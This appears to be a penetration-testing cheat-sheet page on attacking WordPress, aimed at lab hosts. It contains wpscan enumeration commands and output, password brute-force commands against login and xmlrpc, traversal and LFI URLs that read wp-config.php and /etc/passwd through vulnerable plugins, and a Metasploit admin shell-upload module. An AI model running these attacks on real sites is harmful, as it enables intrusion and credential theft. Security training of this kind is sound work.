Wordpress

Enumeration (manual)

Browsing to Robot.txt file to identify a Wordpress site. The content of such file looks like this in Wordpress:

User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml

Interesting files and folders:

WPSCAN

Wpscan helps to identify Wordpress version, plugins, themes and vulnerabilities automatically and must faster than manually:

Enumeration

Use WPSCAN with an API token to get the identified vulnerabilities. You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

 #Enumerate everything
 wpscan --url http://blog.inlanefreight.local/ --enumerate --api-token<SNIP>
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28

       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://blog.inlanefreight.local/ [10.129.1.169]
[+] Started: Wed Oct 15 05:16:04 2025

Identify themes/plugins

# Use the API token for authenticated scanning of WordPress plugins.
wpscan --url http://172.25.210.128 --api-token <API Token Here>
# Enumerate WordPress plugins on the given URL to identify potential vulnerabilities.
wpscan --url http://www.cpent.com --enumerate p
wpscan --url http://www.cpent.com --enumerate t

Note down all interesting findings from your enumeration phase before starting exploitation phase

Attacks

# Perform brute force attack to crack WordPress password. Uses common passwords from a predefined list.
wpscan --url http://172.25.210.128 -U psychotic_animal -P /usr/share/seclists/Passwords/xa

# If xmlrpc is enabled, use it to brute force login credentials which is faster
sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

# Directory traversal on a vulnerable wordpress plugin. This approach uses the 'ebook-download' plugin to access sensitive files.
http://www.cpent.com/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

#Mail-Masta vulnerable plugin LFI example
blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Look for known vulnerability with searchsploit

searchsploit wordpress

upload a malicious plugin if you have admin privileges on the Wordpress application

#Msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
#Set options
set username xx    
set password xx
set rhost 10.10.10.10
set rhost IP
set VHOST blog.wordpresswebsite.local
exploit

PreviousApache Tomcat NextJoomla

Last updated 1 month ago